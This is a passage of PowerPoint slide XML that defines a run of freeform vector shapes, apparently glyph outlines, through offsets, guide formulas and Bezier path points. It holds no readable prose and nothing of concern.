              <a:ext cx="88900" cy="104775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1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9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1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2" y="91"/>
                    <a:pt x="92" y="89"/>
                    <a:pt x="79" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65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6" y="31"/>
                    <a:pt x="143" y="46"/>
                    <a:pt x="144" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="67"/>
                    <a:pt x="146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2" y="0"/>
                    <a:pt x="150" y="7"/>
                    <a:pt x="149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9" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="125"/>
                    <a:pt x="163" y="131"/>
                    <a:pt x="163" y="157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0" name="Freeform 865">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BCB59C2-2C34-41ED-9AC5-A78AB6A5FC92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2976563" y="4051300"/>
              <a:ext cx="96838" cy="130175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199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19 w 211"/>
                <a:gd name="T23" fmla="*/ 91 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 91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2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199" y="91"/>
                    <a:pt x="199" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199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19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2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2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1" name="Freeform 866">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA4A7F8E-9254-4A8A-B7C0-F2130384C965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3098800" y="4078288"/>
              <a:ext cx="103188" cy="101600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0 h 218"/>
                <a:gd name="T4" fmla="*/ 205 w 226"/>
                <a:gd name="T5" fmla="*/ 52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0 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 226"/>
                <a:gd name="T13" fmla="*/ 23 h 218"/>
                <a:gd name="T14" fmla="*/ 74 w 226"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 19 w 226"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 226"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 19 w 226"/>
                <a:gd name="T21" fmla="*/ 33 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 226"/>
                <a:gd name="T23" fmla="*/ 33 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 226"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 19 w 226"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 226"/>
                <a:gd name="T29" fmla="*/ 202 h 218"/>
                <a:gd name="T30" fmla="*/ 19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7 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 226"/>
                <a:gd name="T39" fmla="*/ 187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5" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="52"/>
                    <a:pt x="226" y="44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1" y="3"/>
                    <a:pt x="74" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19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19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4" y="187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2" name="Freeform 867">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8D6EC62-4426-4FD9-9842-D9C83F4950EA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3251200" y="4151313"/>
              <a:ext cx="39688" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 83"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 83"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 83"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 83 w 83"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 41 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 83"/>
                <a:gd name="T15" fmla="*/ 63 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 83"/>
                <a:gd name="T17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51" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="92"/>
                    <a:pt x="20" y="100"/>
                    <a:pt x="14" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="104"/>
                    <a:pt x="0" y="10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  <a:cubicBezTo>
                    <a:pt x="83" y="20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3"/>
                    <a:pt x="41" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="63"/>
                    <a:pt x="47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3" name="Freeform 868">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F4FBF9-6BE3-4312-A0F7-30927EF8AB80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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3468688" y="4076700"/>
              <a:ext cx="88900" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 195"/>
                <a:gd name="T1" fmla="*/ 165 h 223"/>
                <a:gd name="T2" fmla="*/ 178 w 195"/>
                <a:gd name="T3" fmla="*/ 151 h 223"/>
                <a:gd name="T4" fmla="*/ 162 w 195"/>
                <a:gd name="T5" fmla="*/ 162 h 223"/>
                <a:gd name="T6" fmla="*/ 112 w 195"/>
                <a:gd name="T7" fmla="*/ 192 h 223"/>
                <a:gd name="T8" fmla="*/ 34 w 195"/>
                <a:gd name="T9" fmla="*/ 112 h 223"/>
                <a:gd name="T10" fmla="*/ 115 w 195"/>
                <a:gd name="T11" fmla="*/ 31 h 223"/>
                <a:gd name="T12" fmla="*/ 145 w 195"/>
                <a:gd name="T13" fmla="*/ 35 h 223"/>
                <a:gd name="T14" fmla="*/ 167 w 195"/>
                <a:gd name="T15" fmla="*/ 60 h 223"/>
                <a:gd name="T16" fmla="*/ 189 w 195"/>
                <a:gd name="T17" fmla="*/ 37 h 223"/>
                <a:gd name="T18" fmla="*/ 115 w 195"/>
                <a:gd name="T19" fmla="*/ 0 h 223"/>
                <a:gd name="T20" fmla="*/ 0 w 195"/>
                <a:gd name="T21" fmla="*/ 112 h 223"/>
                <a:gd name="T22" fmla="*/ 109 w 195"/>
                <a:gd name="T23" fmla="*/ 223 h 223"/>
                <a:gd name="T24" fmla="*/ 195 w 195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5" h="223">
                  <a:moveTo>
                    <a:pt x="195" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="195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89" y="51"/>
                    <a:pt x="189" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="115" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="46" y="223"/>
                    <a:pt x="109" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="223"/>
                    <a:pt x="195" y="174"/>
                    <a:pt x="195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4" name="Freeform 869">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3943666C-8FD9-46BA-8DBA-841BD180FEDA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId156"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3584575" y="4076700"/>
              <a:ext cx="93663" cy="104775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4 w 205"/>
                <a:gd name="T13" fmla="*/ 109 h 223"/>
                <a:gd name="T14" fmla="*/ 102 w 205"/>
                <a:gd name="T15" fmla="*/ 31 h 223"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 109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5" name="Freeform 870">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A12726F1-D49A-432A-9C69-A8937DA07BAB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3694113" y="4078288"/>
              <a:ext cx="114300" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 26 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21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3 w 249"/>
                <a:gd name="T11" fmla="*/ 33 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 249"/>
                <a:gd name="T13" fmla="*/ 187 h 218"/>
                <a:gd name="T14" fmla="*/ 21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7 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 249"/>
                <a:gd name="T35" fmla="*/ 187 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230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6" name="Freeform 871">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BEA431B-C43F-4E11-8C27-CA419CECFD9E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3827463" y="4076700"/>
              <a:ext cx="88900" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 193"/>
                <a:gd name="T1" fmla="*/ 93 h 223"/>
                <a:gd name="T2" fmla="*/ 78 w 193"/>
                <a:gd name="T3" fmla="*/ 87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7 h 223"/>
                <a:gd name="T28" fmla="*/ 98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2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3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="91"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="78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7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8" y="95"/>
                    <a:pt x="112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7" name="Freeform 872">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46EC002C-0095-4F79-A8AB-E017C33A9923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3937000" y="4051300"/>
              <a:ext cx="96838" cy="130175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4 w 211"/>
                <a:gd name="T25" fmla="*/ 91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2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2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2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8" name="Freeform 873">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A4C6ACB-4EA6-4A6E-9CD8-459B5F14B3D4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4189413" y="4076700"/>
              <a:ext cx="88900" cy="104775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9" name="Freeform 874">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFB98667-D0F8-4B98-A8F5-37A5AF202ED1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4295775" y="4037013"/>
              <a:ext cx="114300" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 249"/>
                <a:gd name="T1" fmla="*/ 159 h 305"/>
                <a:gd name="T2" fmla="*/ 142 w 249"/>
                <a:gd name="T3" fmla="*/ 87 h 305"/>
                <a:gd name="T4" fmla="*/ 77 w 249"/>
                <a:gd name="T5" fmla="*/ 113 h 305"/>
                <a:gd name="T6" fmla="*/ 77 w 249"/>
                <a:gd name="T7" fmla="*/ 21 h 305"/>
                <a:gd name="T8" fmla="*/ 57 w 249"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 20 w 249"/>
                <a:gd name="T11" fmla="*/ 0 h 305"/>
                <a:gd name="T12" fmla="*/ 0 w 249"/>
                <a:gd name="T13" fmla="*/ 16 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 31 h 305"/>
                <a:gd name="T16" fmla="*/ 42 w 249"/>
                <a:gd name="T17" fmla="*/ 31 h 305"/>
                <a:gd name="T18" fmla="*/ 42 w 249"/>
                <a:gd name="T19" fmla="*/ 274 h 305"/>
                <a:gd name="T20" fmla="*/ 20 w 249"/>
                <a:gd name="T21" fmla="*/ 274 h 305"/>
                <a:gd name="T22" fmla="*/ 0 w 249"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 249"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 99 w 249"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 249"/>
                <a:gd name="T29" fmla="*/ 290 h 305"/>
                <a:gd name="T30" fmla="*/ 98 w 249"/>
                <a:gd name="T31" fmla="*/ 274 h 305"/>
                <a:gd name="T32" fmla="*/ 77 w 249"/>
                <a:gd name="T33" fmla="*/ 274 h 305"/>
                <a:gd name="T34" fmla="*/ 77 w 249"/>
                <a:gd name="T35" fmla="*/ 186 h 305"/>
                <a:gd name="T36" fmla="*/ 139 w 249"/>
                <a:gd name="T37" fmla="*/ 117 h 305"/>
                <a:gd name="T38" fmla="*/ 172 w 249"/>
                <a:gd name="T39" fmla="*/ 161 h 305"/>
                <a:gd name="T40" fmla="*/ 172 w 249"/>
                <a:gd name="T41" fmla="*/ 274 h 305"/>
                <a:gd name="T42" fmla="*/ 153 w 249"/>
                <a:gd name="T43" fmla="*/ 274 h 305"/>
                <a:gd name="T44" fmla="*/ 132 w 249"/>
                <a:gd name="T45" fmla="*/ 290 h 305"/>
                <a:gd name="T46" fmla="*/ 153 w 249"/>
                <a:gd name="T47" fmla="*/ 305 h 305"/>
                <a:gd name="T48" fmla="*/ 229 w 249"/>
                <a:gd name="T49" fmla="*/ 305 h 305"/>
                <a:gd name="T50" fmla="*/ 249 w 249"/>
                <a:gd name="T51" fmla="*/ 290 h 305"/>
                <a:gd name="T52" fmla="*/ 229 w 249"/>
                <a:gd name="T53" fmla="*/ 274 h 305"/>
                <a:gd name="T54" fmla="*/ 207 w 249"/>
                <a:gd name="T55" fmla="*/ 274 h 305"/>
                <a:gd name="T56" fmla="*/ 207 w 249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07" y="159"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="108"/>
                    <a:pt x="181" y="87"/>
                    <a:pt x="142" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="87"/>
                    <a:pt x="86" y="104"/>
                    <a:pt x="77" y="113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4"/>
                    <a:pt x="106" y="274"/>
                    <a:pt x="98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3" y="117"/>
                    <a:pt x="139" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="117"/>
                    <a:pt x="172" y="131"/>
                    <a:pt x="172" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="274"/>
                    <a:pt x="132" y="274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  <a:cubicBezTo>
                    <a:pt x="249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0" name="Freeform 875">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8AEA70-8706-42CF-ACC8-434C2234149E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4424363" y="4076700"/>
              <a:ext cx="107950" cy="10477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5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5 w 234"/>
                <a:gd name="T39" fmla="*/ 192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5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0" y="223"/>
                    <a:pt x="131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1" name="Freeform 876">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C88FE5-6932-485E-9958-5DFB6B391907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4540250" y="4078288"/>
              <a:ext cx="103188" cy="101600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2" name="Freeform 877">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E52CE5BE-50EA-491E-A8AA-9AD6A4D9DD51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4787900" y="4057650"/>
              <a:ext cx="88900" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 193"/>
                <a:gd name="T1" fmla="*/ 134 h 215"/>
                <a:gd name="T2" fmla="*/ 158 w 193"/>
                <a:gd name="T3" fmla="*/ 162 h 215"/>
                <a:gd name="T4" fmla="*/ 177 w 193"/>
                <a:gd name="T5" fmla="*/ 170 h 215"/>
                <a:gd name="T6" fmla="*/ 193 w 193"/>
                <a:gd name="T7" fmla="*/ 153 h 215"/>
                <a:gd name="T8" fmla="*/ 186 w 193"/>
                <a:gd name="T9" fmla="*/ 140 h 215"/>
                <a:gd name="T10" fmla="*/ 127 w 193"/>
                <a:gd name="T11" fmla="*/ 108 h 215"/>
                <a:gd name="T12" fmla="*/ 181 w 193"/>
                <a:gd name="T13" fmla="*/ 78 h 215"/>
                <a:gd name="T14" fmla="*/ 193 w 193"/>
                <a:gd name="T15" fmla="*/ 62 h 215"/>
                <a:gd name="T16" fmla="*/ 173 w 193"/>
                <a:gd name="T17" fmla="*/ 45 h 215"/>
                <a:gd name="T18" fmla="*/ 111 w 193"/>
                <a:gd name="T19" fmla="*/ 81 h 215"/>
                <a:gd name="T20" fmla="*/ 113 w 193"/>
                <a:gd name="T21" fmla="*/ 21 h 215"/>
                <a:gd name="T22" fmla="*/ 96 w 193"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 80 w 193"/>
                <a:gd name="T25" fmla="*/ 21 h 215"/>
                <a:gd name="T26" fmla="*/ 82 w 193"/>
                <a:gd name="T27" fmla="*/ 81 h 215"/>
                <a:gd name="T28" fmla="*/ 28 w 193"/>
                <a:gd name="T29" fmla="*/ 50 h 215"/>
                <a:gd name="T30" fmla="*/ 16 w 193"/>
                <a:gd name="T31" fmla="*/ 45 h 215"/>
                <a:gd name="T32" fmla="*/ 0 w 193"/>
                <a:gd name="T33" fmla="*/ 62 h 215"/>
                <a:gd name="T34" fmla="*/ 12 w 193"/>
                <a:gd name="T35" fmla="*/ 78 h 215"/>
                <a:gd name="T36" fmla="*/ 66 w 193"/>
                <a:gd name="T37" fmla="*/ 107 h 215"/>
                <a:gd name="T38" fmla="*/ 12 w 193"/>
                <a:gd name="T39" fmla="*/ 137 h 215"/>
                <a:gd name="T40" fmla="*/ 0 w 193"/>
                <a:gd name="T41" fmla="*/ 153 h 215"/>
                <a:gd name="T42" fmla="*/ 20 w 193"/>
                <a:gd name="T43" fmla="*/ 170 h 215"/>
                <a:gd name="T44" fmla="*/ 82 w 193"/>
                <a:gd name="T45" fmla="*/ 134 h 215"/>
                <a:gd name="T46" fmla="*/ 80 w 193"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 96 w 193"/>
                <a:gd name="T49" fmla="*/ 215 h 215"/>
                <a:gd name="T50" fmla="*/ 113 w 193"/>
                <a:gd name="T51" fmla="*/ 194 h 215"/>
                <a:gd name="T52" fmla="*/ 111 w 193"/>
                <a:gd name="T53" fmla="*/ 13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11" y="134"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="151"/>
                    <a:pt x="123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3" y="161"/>
                    <a:pt x="193" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="145"/>
                    <a:pt x="187" y="140"/>
                    <a:pt x="186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3" y="71"/>
                    <a:pt x="193" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="60"/>
                    <a:pt x="193" y="45"/>
                    <a:pt x="173" y="45"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="68"/>
                    <a:pt x="113" y="35"/>
                    <a:pt x="113" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="16"/>
                    <a:pt x="113" y="0"/>
                    <a:pt x="96" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="0"/>
                    <a:pt x="80" y="16"/>
                    <a:pt x="80" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="35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5"/>
                    <a:pt x="20" y="45"/>
                    <a:pt x="16" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="45"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="71"/>
                    <a:pt x="5" y="74"/>
                    <a:pt x="12" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6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8"/>
                    <a:pt x="80" y="215"/>
                    <a:pt x="96" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="215"/>
                    <a:pt x="113" y="198"/>
                    <a:pt x="113" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="180"/>
                    <a:pt x="112" y="147"/>
                    <a:pt x="111" y="1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3" name="Freeform 878">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4195A37-D960-46BE-A3F8-3F47C34E2CC6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4902200" y="4035425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69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6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8 h 308"/>
                <a:gd name="T28" fmla="*/ 21 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 308"/>
                <a:gd name="T30" fmla="*/ 71 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 308"/>
                <a:gd name="T32" fmla="*/ 71 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 308"/>
                <a:gd name="T34" fmla="*/ 21 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 308"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 308"/>
                <a:gd name="T38" fmla="*/ 21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69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6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1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4" name="Freeform 879">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90070897-EF1D-4823-BC24-6AD34C162F5C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5026025" y="4076700"/>
              <a:ext cx="93663" cy="104775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5 w 205"/>
                <a:gd name="T13" fmla="*/ 109 h 223"/>
                <a:gd name="T14" fmla="*/ 102 w 205"/>
                <a:gd name="T15" fmla="*/ 31 h 223"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 109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5" name="Freeform 880">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C487DA7-88E5-4A5D-9BF2-8EAF371C492D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40325" y="4078288"/>
              <a:ext cx="104775" cy="101600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5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3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6" name="Freeform 881">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC1C102-5CE2-48FC-970D-5604E6B81486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253038" y="4078288"/>
              <a:ext cx="119063" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 28 w 259"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 28 w 259"/>
                <a:gd name="T11" fmla="*/ 187 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 187 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 30 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 259"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 259"/>
                <a:gd name="T29" fmla="*/ 187 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 152 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 144 w 259"/>
                <a:gd name="T39" fmla="*/ 187 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 259"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 184 w 259"/>
                <a:gd name="T43" fmla="*/ 30 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 187 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 201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7 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 186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7"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10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4" y="187"/>
                    <a:pt x="56" y="187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1" y="187"/>
                    <a:pt x="144" y="187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4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3" y="187"/>
                    <a:pt x="181" y="187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7"/>
                    <a:pt x="249" y="187"/>
                    <a:pt x="231" y="187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7" name="Freeform 882">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DAC7882-AA3A-4FBC-9019-B268527666DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId169"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5386388" y="4076700"/>
              <a:ext cx="107950" cy="10477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1" y="223"/>
                    <a:pt x="131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8" name="Freeform 883">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
